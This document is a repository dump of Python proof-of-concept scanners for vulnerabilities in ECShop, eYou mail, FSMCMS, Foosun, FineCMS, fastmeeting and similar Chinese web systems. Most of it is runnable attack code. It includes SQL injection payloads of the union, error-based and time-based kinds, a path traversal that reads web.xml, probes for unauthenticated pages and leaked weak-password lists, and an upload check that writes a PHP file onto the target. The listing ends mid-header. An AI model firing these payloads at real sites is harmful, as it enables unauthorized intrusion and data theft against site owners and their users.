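            req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
        except requests.RequestException as exc:
            cprint("[-] " + __file__ + "====>可能不存在漏洞 (" + str(exc) + ")", "cyan")
            return
        # 81dc9bdb... is md5("1234"), the marker selected by the payload.
        if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
            cprint("[+]存在dreamgallery album.php SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")
        else:
            cprint("[-]不存在dreamgallery_album_id_sqli漏洞", "white", "on_grey")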
33 |
if __name__ == "__main__":
    # Requests are sent with verify=False; drop the InsecureRequestWarning noise.
    warnings.filterwarnings("ignore")
    target_url = sys.argv[1]
    dreamgallery_album_id_sqli_BaseVerify(target_url).run()
--------------------------------------------------------------------------------
/pocs/ecshop/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Binye234/What_Cms_Auto_Poc/56cae28bfecfe3032efe6578c3f571e5de21a3e9/pocs/ecshop/__init__.py
--------------------------------------------------------------------------------
/pocs/ecshop/ecshop_flow_orderid_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: ecshop3.0 flow.php 参数order_id注入
5 | referer: http://www.wooyun.org/bugs/wooyun-2016-0212882
6 | author: Lucifer
7 | description: 文件flow.php中,参数order_id存在SQL注入。
8 | '''
9 | import sys
10 | import json
11 | import requests
12 | import warnings
13 | from termcolor import cprint
14 |
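class ecshop_flow_orderid_sqli_BaseVerify:
    """Error-based check for the ECShop 3.0 flow.php?step=repurchase ``order_id`` SQL injection.

    ``order_id`` is POSTed with an UpdateXml() expression carrying md5(1234); the
    marker only appears in the page if the expression was evaluated by MySQL.
    """

    def __init__(self, url):
        # Base URL of the target; the probe path (starting with "/") is appended verbatim.
        self.url = url

    def run(self):
        """POST the probe and print the verdict (with the POST body on a hit); returns None.

        Request failures are printed with the error instead of being swallowed by a
        bare ``except:`` (which also hid Ctrl-C and programming errors).
        """
        headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        payload = "/flow.php?step=repurchase"
        post_data = {
            "order_id":"1/**/Or/**/UpdateXml(1,ConCat(0x7e,(Md5(1234))),0)/**/Or/**/11#"
        }
        vulnurl = self.url + payload
        try:
            # verify=False is deliberate for scanning; __main__ silences the warning.
            req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False)
        except requests.RequestException as exc:
            cprint("[-] " + __file__ + "====>可能不存在漏洞 (" + str(exc) + ")", "cyan")
            return
        # 81dc9bdb... is md5("1234"), the marker inside the UpdateXml error.
        if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
            cprint("[+]存在ecshop3.0 flow.php 参数order_id注入漏洞...(高危)\tpayload: "+vulnurl+ "\npost: "+json.dumps(post_data, indent=4), "red")
        else:
            cprint("[-]不存在ecshop_flow_orderid_sqli漏洞", "white", "on_grey")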
37 |
if __name__ == "__main__":
    # Requests are sent with verify=False; drop the InsecureRequestWarning noise.
    warnings.filterwarnings("ignore")
    target_url = sys.argv[1]
    ecshop_flow_orderid_sqli_BaseVerify(target_url).run()
42 |
--------------------------------------------------------------------------------
/pocs/ecshop/ecshop_uc_code_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: ecshop uc.php参数code SQL注入
5 | referer: http://www.wooyun.org/bugs/WooYun-2016-174468
6 | author: Lucifer
7 | description: 文件uc.php中,参数code存在SQL注入。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
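class ecshop_uc_code_sqli_BaseVerify:
    """Error-based check for the ECShop /api/uc.php ``code`` SQL injection.

    ``code`` is a fixed, pre-built blob from the original PoC (it is the UCenter
    encrypted parameter; its plaintext is not visible here). The response is
    checked for MySQL's UpdateXml/XPATH error text, i.e. the injected expression
    was evaluated.
    """

    def __init__(self, url):
        # Base URL of the target; the probe path (starting with "/") is appended verbatim.
        self.url = url

    def run(self):
        """Send the probe and print the verdict; returns None.

        Request failures are printed with the error instead of being swallowed by a
        bare ``except:`` (which also hid Ctrl-C and programming errors).
        """
        headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        payload = "/api/uc.php?code=6116diQV4NziG3G8ttFnwTYmEp60E3K27Q0fDWaey%2bTuNLsGKdb1%2b6bPFT%2fIjJEMPlzS5Tm3InnRZKczTQBFXzXmDD5bs4Il5pbFswzA9SWE4gqcbuN8LgLJlTQqvVeSRUfFn4dhgto6yjPsJp7Za6GJEQ"
        vulnurl = self.url + payload
        try:
            # verify=False is deliberate for scanning; __main__ silences the warning.
            req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
        except requests.RequestException as exc:
            cprint("[-] " + __file__ + "====>可能不存在漏洞 (" + str(exc) + ")", "cyan")
            return
        if r"updatexml" in req.text and r"XPATH" in req.text:
            cprint("[+]存在ecshop uc.php参数code SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")
        else:
            cprint("[-]不存在ecshop_uc_code_sqli漏洞", "white", "on_grey")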
33 |
if __name__ == "__main__":
    # Requests are sent with verify=False; drop the InsecureRequestWarning noise.
    warnings.filterwarnings("ignore")
    target_url = sys.argv[1]
    ecshop_uc_code_sqli_BaseVerify(target_url).run()
--------------------------------------------------------------------------------
/pocs/esccms/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Binye234/What_Cms_Auto_Poc/56cae28bfecfe3032efe6578c3f571e5de21a3e9/pocs/esccms/__init__.py
--------------------------------------------------------------------------------
/pocs/esccms/esccms_selectunitmember_unauth.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 易创思教育建站系统未授权访问可查看所有注册用户
5 | referer: http://www.wooyun.org/bugs/wooyun-2010-086704
6 | author: Lucifer
7 | description: 文件selectunitmember.aspx未授权访问。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
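class esccms_selectunitmember_unauth_BaseVerify:
    """Check whether ESCCMS /operationmanage/selectunitmember.aspx is reachable without login.

    A page containing both the WebForms ``doPostBack`` script and the
    ``gvUnitMember`` grid is taken as the member list being rendered; a login
    redirect or error page contains neither.
    """

    def __init__(self, url):
        # Base URL of the target; the probe path (starting with "/") is appended verbatim.
        self.url = url

    def run(self):
        """Fetch the page and print the verdict; returns None.

        Request failures are printed with the error instead of being swallowed by a
        bare ``except:`` (which also hid Ctrl-C and programming errors).
        """
        headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        payload = "/operationmanage/selectunitmember.aspx"
        vulnurl = self.url + payload
        try:
            # verify=False is deliberate for scanning; __main__ silences the warning.
            req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
        except requests.RequestException as exc:
            cprint("[-] " + __file__ + "====>可能不存在漏洞 (" + str(exc) + ")", "cyan")
            return
        if r"doPostBack" in req.text and r"gvUnitMember" in req.text:
            cprint("[+]存在易创思教育建站系统未授权漏洞...(高危)\tpayload: "+vulnurl, "red")
        else:
            cprint("[-]不存在esccms_selectunitmember_unauth漏洞", "white", "on_grey")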
33 |
if __name__ == "__main__":
    # Requests are sent with verify=False; drop the InsecureRequestWarning noise.
    warnings.filterwarnings("ignore")
    target_url = sys.argv[1]
    esccms_selectunitmember_unauth_BaseVerify(target_url).run()
--------------------------------------------------------------------------------
/pocs/eyou/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Binye234/What_Cms_Auto_Poc/56cae28bfecfe3032efe6578c3f571e5de21a3e9/pocs/eyou/__init__.py
--------------------------------------------------------------------------------
/pocs/eyou/eyou_admin_id_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 亿邮Email Defender系统免登陆DBA注入
5 | referer: http://www.wooyun.org/bugs/wooyun-2015-0135406
6 | author: Lucifer
7 | description: google关键字"反垃圾邮件网关 - 亿邮通讯", 参数admin_id未经过滤导致SQL注入,DBA权限。
8 | '''
9 | import sys
10 | import time
11 | import json
12 | import requests
13 | import warnings
14 | from termcolor import cprint
15 |
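class eyou_admin_id_sqli_BaseVerify:
    """Time-based check for the eYou Email Defender /php/admin_login.php ``admin_id`` SQL injection.

    The login form is POSTed with a SLEEP(6) subquery in ``admin_id``; a response
    that takes at least 6 seconds is taken as the sleep having run.

    NOTE(review): a timing verdict can be skewed by a slow or overloaded target.
    A baseline request without SLEEP would make the comparison more reliable;
    not added here to keep the probe to a single request.
    """

    def __init__(self, url):
        # Base URL of the target; the login path (starting with "/") is appended verbatim.
        self.url = url

    def run(self):
        """POST the probe, time it, print the verdict (with the POST body on a hit); returns None.

        The elapsed time uses ``time.monotonic()`` so a wall-clock adjustment during
        the request cannot produce a false verdict. Request failures — including a
        read timeout, which is not a hit — are printed with the error instead of
        being swallowed by a bare ``except:``.
        """
        headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        payload = {
            "admin_id":"a' AND (SELECT * FROM (SELECT(SLEEP(6)))WAcW) AND 'oHiR'='oHiR",
            "admin_pass":"a"
        }
        vulnurl = self.url + r"/php/admin_login.php"
        started = time.monotonic()
        try:
            # timeout=10 leaves headroom above the 6 s sleep; verify=False is
            # deliberate for scanning and __main__ silences the warning.
            requests.post(vulnurl, headers=headers, data=payload, timeout=10, verify=False)
        except requests.RequestException as exc:
            cprint("[-] " + __file__ + "====>可能不存在漏洞 (" + str(exc) + ")", "cyan")
            return
        if time.monotonic() - started >= 6:
            cprint("[+]存在亿邮Defender系统SQL注入漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(payload, indent=4), "red")
        else:
            cprint("[-]不存在eyou_admin_id_sqli漏洞", "white", "on_grey")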
39 |
if __name__ == "__main__":
    # Requests are sent with verify=False; drop the InsecureRequestWarning noise.
    warnings.filterwarnings("ignore")
    target_url = sys.argv[1]
    eyou_admin_id_sqli_BaseVerify(target_url).run()
44 |
--------------------------------------------------------------------------------
/pocs/eyou/eyou_resetpw.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 亿邮邮件系统重置密码问题暴力破解
5 | referer: http://www.wooyun.org/bugs/wooyun-2015-0162892
6 | author: Lucifer
7 | description: 亿邮邮件系统找回密码处,如果用户设置问题密码过于简单可被暴力破解。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
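class eyou_resetpw_BaseVerify:
    """Detect whether the eYou mail password-reset (security question) page is exposed.

    This is only a fingerprint: a 200 containing ``pw_intensity`` means the reset
    form is served. Whether the question is actually brute-forceable (no rate
    limit, weak question) is not tested here — treat the result as a lead, not a
    finding.
    """

    def __init__(self, url):
        # Base URL of the target; "/?q=resetpw" is appended verbatim.
        self.url = url

    def run(self):
        """Fetch the reset page and print the verdict; returns None.

        Request failures are printed with the error instead of being swallowed by a
        bare ``except:`` (which also hid Ctrl-C and programming errors).
        """
        payload = "/?q=resetpw"
        vulnurl = self.url + payload
        try:
            # verify=False is deliberate for scanning; __main__ silences the warning.
            req = requests.get(vulnurl, timeout=10, verify=False)
        except requests.RequestException as exc:
            cprint("[-] " + __file__ + "====>可能不存在漏洞 (" + str(exc) + ")", "cyan")
            return
        if req.status_code == 200 and r"pw_intensity" in req.text:
            cprint("[+]存在eyou邮件系统重置密码问题页面...(敏感信息)\tpayload: "+vulnurl, "green")
        else:
            cprint("[-]不存在eyou_resetpw漏洞", "white", "on_grey")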
31 |
if __name__ == "__main__":
    # Requests are sent with verify=False; drop the InsecureRequestWarning noise.
    warnings.filterwarnings("ignore")
    target_url = sys.argv[1]
    eyou_resetpw_BaseVerify(target_url).run()
--------------------------------------------------------------------------------
/pocs/eyou/eyou_user_kw_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 亿邮mail5 user 参数kw SQL注入
5 | referer: http://www.wooyun.org/bugs/wooyun-2010-074260
6 | author: Lucifer
7 | description: 文件user中,参数kw存在SQL注入。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
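class eyou_user_kw_sqli_BaseVerify:
    """UNION-based check for the eYou mail5 /user/?q=help&type=search ``kw`` SQL injection.

    md5(1234) is selected as the fourth column; it only appears in the page if
    the injected UNION SELECT was executed.
    """

    def __init__(self, url):
        # Base URL of the target; the probe path (starting with "/") is appended verbatim.
        self.url = url

    def run(self):
        """Send the probe and print the verdict; returns None.

        Request failures are printed with the error instead of being swallowed by a
        bare ``except:`` (which also hid Ctrl-C and programming errors).
        """
        headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        payload = "/user/?q=help&type=search&page=1&kw=-1%22)UnIoN/**/AlL/**/SeLeCt/**/1,2,3,Md5(1234),5,6,7%23"
        vulnurl = self.url + payload
        try:
            # verify=False is deliberate for scanning; __main__ silences the warning.
            req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
        except requests.RequestException as exc:
            cprint("[-] " + __file__ + "====>可能不存在漏洞 (" + str(exc) + ")", "cyan")
            return
        # 81dc9bdb... is md5("1234"), the marker selected by the payload.
        if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
            cprint("[+]存在亿邮mail5 user 参数kw SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")
        else:
            cprint("[-]不存在eyou_user_kw_sqli漏洞", "white", "on_grey")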
33 |
if __name__ == "__main__":
    # Requests are sent with verify=False; drop the InsecureRequestWarning noise.
    warnings.filterwarnings("ignore")
    target_url = sys.argv[1]
    eyou_user_kw_sqli_BaseVerify(target_url).run()
--------------------------------------------------------------------------------
/pocs/eyou/eyou_weakpass.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 亿邮邮箱弱口令列表泄露
5 | referer: http://wooyun.org/bugs/wooyun-2010-061538
6 | author: Lucifer
7 | description: 亿邮邮件系统存在弱口令账户信息泄露,导致非法登录
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
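class eyou_weakpass_BaseVerify:
    """Check two eYou mail files that leak account data when served: /weakpass.list and /sysinfo.html.

    /weakpass.list is a list of accounts with weak passwords (detected by an "@"
    in a 200 body); /sysinfo.html is the system-information page (detected by its
    "系统基本信息检查" heading). Redirects are not followed, so a login bounce is not
    mistaken for content.
    """

    # (path, predicate on the response body) for each probe; both print the same
    # generic "information disclosure" line on a hit, as the original did.
    _CHECKS = (
        ("/weakpass.list", lambda body: r"@" in body),
        ("/sysinfo.html", lambda body: r"系统基本信息检查" in body),
    )

    def __init__(self, url):
        # Base URL of the target; each probe path (starting with "/") is appended verbatim.
        self.url = url

    def run(self):
        """Fetch each file and print a verdict per file; returns None.

        The two copy-pasted try blocks of the original are folded into one loop.
        Request failures are printed with the error instead of being swallowed by a
        bare ``except:`` (which also hid Ctrl-C and programming errors).
        """
        for payload, looks_exposed in self._CHECKS:
            vulnurl = self.url + payload
            try:
                # verify=False is deliberate for scanning; __main__ silences the warning.
                req = requests.get(vulnurl, timeout=10, verify=False, allow_redirects=False)
            except requests.RequestException as exc:
                cprint("[-] " + __file__ + "====>可能不存在漏洞 (" + str(exc) + ")", "cyan")
                continue
            if req.status_code == 200 and looks_exposed(req.text):
                cprint("[+]存在eyou邮件系统信息泄露...(敏感信息)\tpayload: "+vulnurl, "green")
            else:
                cprint("[-]不存在eyou_weakpass漏洞", "white", "on_grey")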
42 |
if __name__ == "__main__":
    # Requests are sent with verify=False; drop the InsecureRequestWarning noise.
    warnings.filterwarnings("ignore")
    target_url = sys.argv[1]
    eyou_weakpass_BaseVerify(target_url).run()
47 |
--------------------------------------------------------------------------------
/pocs/fastmeeting/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Binye234/What_Cms_Auto_Poc/56cae28bfecfe3032efe6578c3f571e5de21a3e9/pocs/fastmeeting/__init__.py
--------------------------------------------------------------------------------
/pocs/fastmeeting/fastmeeting_download_filedownload.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 好视通视频会议系统(fastmeeting)任意文件遍历
5 | referer: http://www.wooyun.org/bugs/wooyun-2010-0143719
6 | author: Lucifer
7 | description: 文件/dbbackup/adminMgr/download.jsp中,参数fileName存在任意文件下载。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
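class fastmeeting_download_filedownload_BaseVerify:
    """Path-traversal file download check for fastmeeting /dbbackup/adminMgr/download.jsp ``fileName``.

    The probe asks for ``../WEB-INF/web.xml``; a response served as
    ``application/xml`` is taken as the deployment descriptor having been read.
    """

    def __init__(self, url):
        # Base URL of the target; the probe path (starting with "/") is appended verbatim.
        self.url = url

    def run(self):
        """Send the probe and print the verdict; returns None.

        Fixes over the original: a response without a Content-Type header raised
        KeyError (reported as "probably not vulnerable" by the bare ``except:``) —
        the header is now read with a default; a ``; charset=...`` suffix no longer
        defeats the comparison; and request failures are printed with the error.
        """
        headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        payload = "/dbbackup/adminMgr/download.jsp?fileName=../WEB-INF/web.xml"
        vulnurl = self.url + payload
        try:
            # verify=False is deliberate for scanning; __main__ silences the warning.
            req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
        except requests.RequestException as exc:
            cprint("[-] " + __file__ + "====>可能不存在漏洞 (" + str(exc) + ")", "cyan")
            return
        media_type = req.headers.get("Content-Type", "").split(";")[0].strip()
        if media_type == "application/xml":
            cprint("[+]存在好视通视频会议系统(fastmeeting)任意文件下载漏洞...(高危)\tpayload: "+vulnurl, "red")
        else:
            cprint("[-]不存在fastmeeting_download_filedownload漏洞", "white", "on_grey")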
33 |
if __name__ == "__main__":
    # Requests are sent with verify=False; drop the InsecureRequestWarning noise.
    warnings.filterwarnings("ignore")
    target_url = sys.argv[1]
    fastmeeting_download_filedownload_BaseVerify(target_url).run()
--------------------------------------------------------------------------------
/pocs/finecms/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Binye234/What_Cms_Auto_Poc/56cae28bfecfe3032efe6578c3f571e5de21a3e9/pocs/finecms/__init__.py
--------------------------------------------------------------------------------
/pocs/finecms/finecms_uploadfile.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: FineCMS免费版文件上传漏洞
5 | referer: http://www.wooyun.org/bugs/wooyun-2015-0105251
6 | author: Lucifer
7 | description: FineCMS上传页面无限制,可以上传任意文件。
8 | '''
9 | import sys
10 | import random
11 | import requests
12 | import warnings
13 | from termcolor import cprint
14 |
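class finecms_uploadfile_BaseVerify:
    """Arbitrary-upload check for FineCMS /dayrui/libraries/Chart/ofc_upload_image.php.

    The probe POSTs a body to ofc_upload_image.php under a random ``testNNNN.php``
    name, then fetches it back from /dayrui/libraries/tmp-upload-images/ and looks
    for md5(1234) in the output.

    WARNING: this probe WRITES a .php file onto the target and leaves it there —
    it is intrusive, not a passive fingerprint. Make sure that is within scope and
    clean the file up afterwards.

    NOTE(review): ``post_data`` is empty in this listing, so nothing that could
    print md5(1234) is ever uploaded and the marker check cannot succeed as
    written. The body was most likely lost in extraction (everything between
    ``'''`` and ``'''`` looks like a stripped ``<...>`` span) — restore it from
    upstream before relying on this check.
    """

    def __init__(self, url):
        # Base URL of the target; both the upload and fetch paths are appended verbatim.
        self.url = url

    def run(self):
        """Upload, fetch back, print the verdict; returns None.

        Request failures on either step are printed with the error instead of
        being swallowed by a bare ``except:``.
        """
        headers = {
            "Content-Type":"application/oct",
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        payload = "/dayrui/libraries/Chart/ofc_upload_image.php?name="
        post_data = ''''''  # see class NOTE: empty here, so the marker check cannot fire
        filename = "test" + str(random.randrange(1000,9999)) + ".php"
        vulnurl = self.url + payload + filename
        shellpath = self.url + "/dayrui/libraries/tmp-upload-images/"+filename
        try:
            # verify=False is deliberate for scanning; __main__ silences the warning.
            requests.post(vulnurl, headers=headers, data=post_data, timeout=10, verify=False)
            fetched = requests.get(shellpath, headers=headers, timeout=10, verify=False)
        except requests.RequestException as exc:
            cprint("[-] " + __file__ + "====>可能不存在漏洞 (" + str(exc) + ")", "cyan")
            return
        # 81dc9bdb... is md5("1234").
        if r"81dc9bdb52d04dc20036dbd8313ed055" in fetched.text:
            cprint("[+]存在FineCMS任意文件上传漏洞...(高危)\t\tpayload: "+shellpath, "red")
        else:
            cprint("[-]不存在finecms_uploadfile漏洞", "white", "on_grey")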
39 |
if __name__ == "__main__":
    # Requests are sent with verify=False; drop the InsecureRequestWarning noise.
    warnings.filterwarnings("ignore")
    target_url = sys.argv[1]
    finecms_uploadfile_BaseVerify(target_url).run()
--------------------------------------------------------------------------------
/pocs/foosun/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Binye234/What_Cms_Auto_Poc/56cae28bfecfe3032efe6578c3f571e5de21a3e9/pocs/foosun/__init__.py
--------------------------------------------------------------------------------
/pocs/foosun/foosun_City_ajax_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: Dotnetcms(风讯cms)SQL注入漏洞
5 | referer: https://silic.wiki/0day:%E9%A3%8E%E8%BF%85_dotnetcms_2.0-1.0_sql_injection
6 | author: Lucifer
7 | description: 文件City_ajax.aspx中,参数CityId存在SQL注入。
8 | '''
9 | import sys
10 | import time
11 | import requests
12 | import warnings
13 | from termcolor import cprint
14 |
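class foosun_City_ajax_sqli_BaseVerify:
    """Time-based check for the Dotnetcms (Foosun) /user/City_ajax.aspx ``CityId`` SQL injection.

    ``CityId`` carries a ``WAITFOR DELAY '0:0:6'`` (SQL Server); a response that
    takes at least 6 seconds is taken as the delay having run.

    NOTE(review): a timing verdict can be skewed by a slow or overloaded target.
    A baseline request without the delay would make the comparison more
    reliable; not added here to keep the probe to a single request.
    """

    def __init__(self, url):
        # Base URL of the target; the probe path (starting with "/") is appended verbatim.
        self.url = url

    def run(self):
        """Send the probe, time it, print the verdict; returns None.

        The elapsed time uses ``time.monotonic()`` so a wall-clock adjustment during
        the request cannot produce a false verdict. Request failures — including a
        read timeout, which is not a hit — are printed with the error instead of
        being swallowed by a bare ``except:``.
        """
        headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        payload = "/user/City_ajax.aspx?CityId=1%27WAiTFoR%20DeLAy%20%270:0:6%27--"
        vulnurl = self.url + payload
        started = time.monotonic()
        try:
            # timeout=10 leaves headroom above the 6 s delay; verify=False is
            # deliberate for scanning and __main__ silences the warning.
            requests.get(vulnurl, headers=headers, timeout=10, verify=False)
        except requests.RequestException as exc:
            cprint("[-] " + __file__ + "====>可能不存在漏洞 (" + str(exc) + ")", "cyan")
            return
        if time.monotonic() - started >= 6:
            cprint("[+]存在Dotnetcms(风讯cms)SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")
        else:
            cprint("[-]不存在foosun_City_ajax_sqli漏洞", "white", "on_grey")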
35 |
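if __name__ == "__main__":
    # Presumably silences the InsecureRequestWarning that verify=False triggers in run().
    warnings.filterwarnings("ignore")
    # A missing target used to surface as an IndexError traceback; print a usage line instead.
    if len(sys.argv) < 2:
        sys.exit("usage: %s <target_base_url>" % sys.argv[0])
    testVuln = foosun_City_ajax_sqli_BaseVerify(sys.argv[1])
    testVuln.run()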
--------------------------------------------------------------------------------
/pocs/fsmcms/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Binye234/What_Cms_Auto_Poc/56cae28bfecfe3032efe6578c3f571e5de21a3e9/pocs/fsmcms/__init__.py
--------------------------------------------------------------------------------
/pocs/fsmcms/fsmcms_columninfo_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: FSMCMS columninfo.jsp文件参数ColumnID SQL注入
5 | referer: http://www.wooyun.org/bugs/wooyun-2015-0144330
6 | author: Lucifer
7 | description: 文件columninfo.jsp中,参数ColumnID存在SQL注入。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
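class fsmcms_columninfo_sqli_BaseVerify:
    """Union-based SQL injection check for FSMCMS columninfo.jsp (``ColumnID``).

    The probe selects ``Md5(1234)`` into the result set and looks for its hex
    digest in the response body.
    """

    def __init__(self, url):
        # Target base URL; the probe path is appended to it unchanged.
        self.url = url

    def run(self):
        """Send the probe and print a coloured verdict; returns nothing."""
        headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        payload = "/fsmcms/cms/web/columninfo.jsp?ColumnID=-5/**/UnIoN/**/SeLeCt/**/1,2,Md5(1234),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38%23"
        vulnurl = self.url + payload
        try:
            req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
            # 81dc9bdb... is md5("1234"): it only appears if the injected SELECT was evaluated.
            if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
                cprint("[+]存在FSMCMS columninfo.jsp文件参数ColumnID SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")
            else:
                cprint("[-]不存在fsmcms_columninfo_sqli漏洞", "white", "on_grey")
        # `except Exception` instead of a bare except so Ctrl-C / SystemExit still propagate.
        except Exception:
            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")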
33 |
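if __name__ == "__main__":
    # Presumably silences the InsecureRequestWarning that verify=False triggers in run().
    warnings.filterwarnings("ignore")
    # A missing target used to surface as an IndexError traceback; print a usage line instead.
    if len(sys.argv) < 2:
        sys.exit("usage: %s <target_base_url>" % sys.argv[0])
    testVuln = fsmcms_columninfo_sqli_BaseVerify(sys.argv[1])
    testVuln.run()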
--------------------------------------------------------------------------------
/pocs/fsmcms/fsmcms_p_replydetail_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: fsmcms p_replydetail.jsp注入漏洞
5 | referer: http://www.wooyun.org/bugs/wooyun-2010-065148
6 | author: Lucifer
7 | description: 文件/fsmcms/cms/leadermail/p_replydetail.jsp中,参数MailId存在SQL注入。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
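class fsmcms_p_replydetail_sqli_BaseVerify:
    """Union-based SQL injection check for FSMCMS p_replydetail.jsp (``MailId``).

    The probe selects ``Md5(1234)`` into the result set and looks for its hex
    digest in the response body.
    """

    def __init__(self, url):
        # Target base URL; the probe path is appended to it unchanged.
        self.url = url

    def run(self):
        """Send the probe and print a coloured verdict; returns nothing."""
        headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        payload = "/fsmcms/cms/leadermail/p_replydetail.jsp?MailId=-1%27UnIoN%20AlL%20SeLeCT%20NuLl%20NuLl%20NuLl%20NuLl%20Md5(1234)%20NuLl--%20"
        vulnurl = self.url + payload
        try:
            req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
            # 81dc9bdb... is md5("1234"): it only appears if the injected SELECT was evaluated.
            if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
                cprint("[+]存在fsmcms SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")
            else:
                cprint("[-]不存在fsmcms_p_replydetail_sqli漏洞", "white", "on_grey")
        # `except Exception` instead of a bare except so Ctrl-C / SystemExit still propagate.
        except Exception:
            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")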
33 |
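if __name__ == "__main__":
    # Presumably silences the InsecureRequestWarning that verify=False triggers in run().
    warnings.filterwarnings("ignore")
    # A missing target used to surface as an IndexError traceback; print a usage line instead.
    if len(sys.argv) < 2:
        sys.exit("usage: %s <target_base_url>" % sys.argv[0])
    testVuln = fsmcms_p_replydetail_sqli_BaseVerify(sys.argv[1])
    testVuln.run()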
--------------------------------------------------------------------------------
/pocs/fsmcms/fsmcms_setup_reinstall.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: FSMCMS网站重装漏洞
5 | referer: http://www.wooyun.org/bugs/wooyun-2010-043380
6 | author: Lucifer
